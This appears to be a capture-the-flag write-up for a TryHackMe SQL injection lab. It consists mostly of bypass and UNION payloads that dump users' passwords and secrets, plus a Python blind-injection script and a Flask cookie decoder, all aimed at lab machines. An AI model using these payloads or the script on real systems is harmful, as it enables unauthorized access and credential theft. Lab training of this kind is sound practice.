SQL Injection Lab

Room Link: https://tryhackme.com/room/sqlilab

Introduction to SQL Injection: Part 1

SQL Injection 1: Input Box Non-String

1 or 1=1-- -

SQL Injection 2: Input Box String

1' or '1'='1'-- -

SQL Injection 3: URL Injection

$VICTIM:5000/sesqli3/login?profileID=1' or 1=1-- -&password=a

SQL Injection 4: POST Injection

POST /sesqli4/login HTTP/1.1
Host: 10.10.164.155:5000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://10.10.164.155:5000
Connection: close
Referer: http://10.10.164.155:5000/sesqli4/login
Cookie: session=.eJy90jFrYzEMB_Dv4jmDZUu2nPk46NLt5iLJMjyaNu17PUoJ-e7nXI-jQ4dM2SwJhH_--xQ2314PCzx0eZOwP4Vfdz_CHnbBn2Q5hH0Iu_AsTz5PP1d5tuOyXTqLPd5_dmf1Itv2clzf7tdZc4mUiCJgZPw3fD-ufY7QOI8aTUYWsCaGhrWnhuRxVB61Z5JqDVDYgaFkMU-ZBdS9gF62rcexHPxyxwBxNjY5yPoR9oniefcf83vz9WHpfyGfvXQLYC0aidFb0xoVW1UpyJkUnBw9RaCEVIs0kMo5C08rFNds2ebGa4HpG2C-BdBsoEGExuRZXWZydQpkFHVuOXJXm_Mxjbm7zgeY-WKx1HtDALsWmL8B4i2AvQnUwtgGWbFOM0TqQI3ZSKypKs_Pi105F-k8mDRy9QQ4BJpdnSB-AZ7_ABfzCOM.ZO_PVg.gxMIbBhBjlFSHtc1twhp3ImdLj4
Upgrade-Insecure-Requests: 1

profileID=-1%27%20or%201=1--%20-&password=a

Introduction to SQL Injection: Part 2

Shows all the table names

',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

Show all fields from the table usertable

l FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='

Shows all the fields from the table secret

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

Display all the values from the table secrets

',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='

Vulnerable Startup: Broken Authentication

1' or '1'='1'-- -

Vulnerable Startup: Broken Authentication

Username: ' OR 1=1-- -

decode_cookie.py

#!/usr/bin/python3
import zlib
import sys
import json
from itsdangerous import base64_decode


def decode(cookie):
    """
    Decode a Flask cookie

    https://www.kirsle.net/wizards/flask-session.cgi
    """
    try:
        compressed = False
        payload = cookie

        if payload.startswith('.'):
            compressed = True
            payload = payload[1:]

        data = payload.split(".")[0]

        data = base64_decode(data)
        if compressed:
            data = zlib.decompress(data)

        return data.decode("utf-8")
    except Exception as e:
        return f"[Decoding error: are you sure this was a Flask session cookie? {e}]"


cookie = sys.argv[1]
data = decode(cookie)
json_data = json.loads(data)
pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": "))
print(pretty)

python decode_cookie.py .eJyrVkrOSMzJSc1LTzWKLy1OLYrPTFGyMtRBF85LzE1VslJKTMnNzFOqBQAYpRNS.ZPCIPg.GEqyzNXd85i4M0Oqpt9ITOmwTOM

' UNION SELECT 1,NULL-- -

' UNION SELECT 1,2-- - 

Enmerutate passwords, the below only returns the first result which we probably don't want.

' UNION SELECT 1, password from users-- -

This way concats all the passwords

' UNION SELECT 1,group_concat(password) FROM users-- -

Vulnerable Startup: Broken Authentication 3 (Blind Injection)

challenge3-exploit.py

#!/usr/bin/python3
import sys
import requests
import string


def send_p(url, query):
    payload = {"username": query, "password": "admin"}
    try:
        r = requests.post(url, data=payload, timeout=3)
    except requests.exceptions.ConnectTimeout:
        print("[!] ConnectionTimeout: Try to adjust the timeout time")
        sys.exit(1)
    return r.text


def main(addr):
    url = f"http://{addr}/challenge3/login"
    flag = ""
    password_len = 38
    # Not the most efficient way of doing it...
    for i in range(1, password_len):
        for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":
            # Convert char to hex and remove "0x"
            h = hex(ord(c))[2:]
            query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \
                f"{i},1)=CAST(X'{h}' AS TEXT)--"

            resp = send_p(url, query)
            if not "Invalid" in resp:
                flag += c
                print(flag)
    print(f"[+] FLAG: {flag}")


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")
        sys.exit(0)
    main(sys.argv[1])

Kali

python challenge3-exploit.py $KALI:5000

Vulnerable Startup: Vulnerable Notes

Create user

Username: '  union select 1,group_concat(password) from users'
Password: blah

Vulnerable Startup: Change Password

Signup

Username: admin'-- -

Vulnerable Startup: Book Title

') union select 1,group_concat(username),group_concat(password),4 from users-- -

Vulnerable Startup: Book Title 2

' union select '-1''union select group_concat(username),group_concat(password),3,4 from users-- -